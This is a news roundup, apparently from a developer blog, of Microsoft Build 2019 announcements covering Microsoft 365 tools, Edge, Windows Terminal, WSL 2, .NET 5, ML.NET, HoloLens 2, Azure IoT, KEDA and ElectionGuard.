At the ongoing Microsoft Build 2019 conference, Microsoft has announced a ton of new features and tool releases with a focus on innovation using AI and mixed reality with the intelligent cloud and the intelligent edge. In his opening keynote, Microsoft CEO Satya Nadella outlined the company’s vision and developer opportunity across Microsoft Azure, Microsoft Dynamics 365 and IoT Platform, Microsoft 365, and Microsoft Gaming. “As computing becomes embedded in every aspect of our lives, the choices developers make will define the world we live in,” said Satya Nadella, CEO, Microsoft. “Microsoft is committed to providing developers with trusted tools and platforms spanning every layer of the modern technology stack to build magical experiences that create new opportunity for everyone.” https://youtu.be/rIJRFHDr1QE Increasing developer productivity in Microsoft 365 platform Microsoft Graph data connect Microsoft Graphs are now powered with data connectivity, a service that combines analytics data from the Microsoft Graph with customers’ business data. Microsoft Graph data connect will provide Office 365 data and Microsoft Azure resources to users via a toolset. The migration pipelines are deployed and managed through Azure Data Factory. Microsoft Graph data connect can be used to create new apps shared within enterprises or externally in the Microsoft Azure Marketplace. It is generally available as a feature in Workplace Analytics and also as a standalone SKU for ISVs. More information here. Microsoft Search Microsoft Search works as a unified search experience across all Microsoft apps-  Office, Outlook, SharePoint, OneDrive, Bing and Windows. It applies AI technology from Bing and deep personalized insights surfaced by the Microsoft Graph to personalized searches. Other features included in Microsoft Search are: Search box displacement Zero query typing and key-phrase suggestion feature Query history feature, and personal search query history Administrator access to the history of popular searches for their organizations, but not to search history for individual users Files/people/site/bookmark suggestions Microsoft Search will begin publicly rolling out to all Microsoft 365 and Office 365 commercial subscriptions worldwide at the end of May. Read more on MS Search here. Fluid Framework As the name suggests Microsoft's newly launched Fluid framework allows seamless editing and collaboration between different applications. Essentially, it is a web-based platform and componentized document model that allows users to, for example, edit a document in an application like Word and then share a table from that document in Microsoft Teams (or even a third-party application) with real-time syncing. Microsoft says Fluid can translate text, fetch content, suggest edits, perform compliance checks, and more. The company will launch the software developer kit and the first experiences powered by the Fluid Framework later this year on Microsoft Word, Teams, and Outlook. Read more about Fluid framework here. Microsoft Edge new features Microsoft Build 2019 paved way for a bundle of new features to Microsoft’s flagship web browser, Microsoft Edge. New features include: Internet Explorer mode: This mode integrates Internet Explorer directly into the new Microsoft Edge via a new tab. This allows businesses to run legacy Internet Explorer-based apps in a modern browser. Privacy Tools: Additional privacy controls which allow customers to choose from 3 levels of privacy in Microsoft Edge—Unrestricted, Balanced, and Strict. These options limit third parties to track users across the web.  “Unrestricted” allows all third-party trackers to work on the browser. “Balanced” prevents third-party trackers from sites the user has not visited before. And “Strict” blocks all third-party trackers. Collections: Collections allows users to collect, organize, share and export content more efficiently and with Office integration. Microsoft is also migrating Edge as a whole over to Chromium. This will make Edge easier to develop for by third parties. For more details, visit Microsoft’s developer blog. New toolkit enhancements in Microsoft 365 Platform Windows Terminal Windows Terminal is Microsoft’s new application for Windows command-line users. Top features include: User interface with emoji-rich fonts and graphics-processing-unit-accelerated text rendering Multiple tab support and theming and customization features Powerful command-line user experience for users of PowerShell, Cmd, Windows Subsystem for Linux (WSL) and all forms of command-line application Windows Terminal will arrive in mid-June and will be delivered via the Microsoft Store in Windows 10. Read more here. React Native for Windows Microsoft announced a new open-source project for React Native developers at Microsoft Build 2019. Developers who prefer to use the React/web ecosystem to write user-experience components can now leverage those skills and components on Windows by using “React Native for Windows” implementation. React for Windows is under the MIT License and will allow developers to target any Windows 10 device, including PCs, tablets, Xbox, mixed reality devices and more. The project is being developed on GitHub and is available for developers to test. More mature releases will follow soon. Windows Subsystem for Linux 2 Microsoft rolled out a new architecture for Windows Subsystem for Linux: WSL 2 at the MSBuild 2019. Microsoft will also be shipping a fully open-source Linux kernel with Windows specially tuned for WSL 2. New features include massive file system performance increases (twice as much speed for file-system heavy operations, such as Node Package Manager install). WSL also supports running Linux Docker containers. The next generation of WSL arrives for Insiders in mid-June. More information here. New releases in multiple Developer Tools .NET 5 arrives in 2020 .NET 5 is the next major version of the .NET Platform which will be available in 2020. .NET 5 will have all .NET Core features as well as more additions: One Base Class Library containing APIs for building any type of application More choice on runtime experiences Java interoperability will be available on all platforms. Objective-C and Swift interoperability will be supported on multiple operating systems .NET 5 will provide both Just-in-Time (JIT) and Ahead-of-Time (AOT) compilation models to support multiple compute and device scenarios. .NET 5 also will offer one unified toolchain supported by new SDK project types as well as a flexible deployment model (side-by-side and self-contained EXEs) Detailed information here. ML.NET 1.0 ML.NET is Microsoft’s open-source and cross-platform framework that runs on Windows, Linux, and macOS and makes machine learning accessible for .NET developers. Its new version, ML.NET 1.0, was released at the Microsoft Build Conference 2019 yesterday. Some new features in this release are: Automated Machine Learning Preview: Transforms input data by selecting the best performing ML algorithm with the right settings. AutoML support in ML.NET is in preview and currently supports Regression and Classification ML tasks. ML.NET Model Builder Preview: Model Builder is a simple UI tool for developers which uses AutoML to build ML models. It also generates model training and model consumption code for the best performing model. ML.NET CLI Preview: ML.NET CLI is a dotnet tool which generates ML.NET Models using AutoML and ML.NET. The ML.NET CLI quickly iterates through a dataset for a specific ML Task and produces the best model. Visual Studio IntelliCode, Microsoft’s tool for AI-assisted coding Visual Studio IntelliCode, Microsoft’s AI-assisted coding is now generally available. It is essentially an enhanced IntelliSense, Microsoft’s extremely popular code completion tool. Intellicode is trained by using the code of thousands of open-source projects from GitHub that have at least 100 stars. It is available for C# and XAML for Visual Studio and Java, JavaScript, TypeScript, and Python for Visual Studio Code. IntelliCode also is included by default in Visual Studio 2019, starting in version 16.1 Preview 2. Additional capabilities, such as custom models, remain in public preview. Visual Studio 2019 version 16.1 Preview 2 Visual Studio 2019 version 16.1 Preview 2 release includes IntelliCode and the GitHub extensions by default. It also brings out of preview the Time Travel Debugging feature introduced with version 16.0. Also includes multiple performances and productivity improvements for .NET and C++ developers. Gaming and Mixed Reality Minecraft AR game for mobile devices At the end of Microsoft’s Build 2019 keynote yesterday, Microsoft teased a new Minecraft game in augmented reality, running on a phone. The teaser notes that more information will be coming on May 17th, the 10-year anniversary of Minecraft. https://www.youtube.com/watch?v=UiX0dVXiGa8 HoloLens 2 Development Edition and unreal engine support The HoloLens 2 Development Edition includes a HoloLens 2 device, $500 in Azure credits and three-months free trials of Unity Pro and Unity PiXYZ Plugin for CAD data, starting at $3,500 or as low as $99 per month. The HoloLens 2 Development Edition will be available for preorder soon and will ship later this year. Unreal Engine support for streaming and native platform integration will be available for HoloLens 2 by the end of May. Intelligent Edge and IoT Azure IoT Central new features Microsoft Build 2019 also featured new additions to Azure IoT Central, an IoT software-as-a-service solution. Better rules processing and customs rules with services like Azure Functions or Azure Stream Analytics Multiple dashboards and data visualization options for different types of users Inbound and outbound data connectors, so that operators can integrate with   systems Ability to add custom branding and operator resources to an IoT Central application with new white labeling options New Azure IoT Central features are available for customer trials. IoT Plug and Play IoT Plug and Play is a new, open modeling language to connect IoT devices to the cloud seamlessly without developers having to write a single line of embedded code. IoT Plug and Play also enable device manufacturers to build smarter IoT devices that just work with the cloud. Cloud developers will be able to find IoT Plug and Play enabled devices in Microsoft’s Azure IoT Device Catalog. The first device partners include Compal, Kyocera, and STMicroelectronics, among others. Azure Maps Mobility Service Azure Maps Mobility Service is a new API which provides real-time public transit information, including nearby stops, routes and trip intelligence. This API also will provide transit services to help with city planning, logistics, and transportation. Azure Maps Mobility Service will be in public preview in June. Read more about Azure Maps Mobility Service here. KEDA: Kubernetes-based event-driven autoscaling Microsoft and Red Hat collaborated to create KEDA, which is an open-sourced project that supports the deployment of serverless, event-driven containers on Kubernetes. It can be used in any Kubernetes environment — in any public/private cloud or on-premises such as Azure Kubernetes Service (AKS) and Red Hat OpenShift. KEDA has support for built-in triggers to respond to events happening in other services or components. This allows the container to consume events directly from the source, instead of routing through HTTP. KEDA also presents a new hosting option for Azure Functions that can be deployed as a container in Kubernetes clusters. Securing elections and political campaigns ElectionGuard SDK and Microsoft 365 for Campaigns ElectionGuard, is a free open-source software development kit (SDK) as an extension of Microsoft’s Defending Democracy Program to enable end-to-end verifiability and improved risk-limiting audit capabilities for elections in voting systems. Microsoft365 for Campaigns provides security capabilities of Microsoft 365 Business to political parties and individual candidates. More details here. Microsoft Build is in its 6th year and will continue till 8th May. The conference hosts over 6,000 attendees with early 500 student-age developers and over 2,600 customers and partners in attendance. Watch it live here! Microsoft introduces Remote Development extensions to make remote development easier on VS Code Docker announces a collaboration with Microsoft’s .NET at DockerCon 2019 How Visual Studio Code can help bridge the gap between full-stack development and DevOps [Sponsered by Microsoft]
Read more
  • 0
  • 0
  • 37033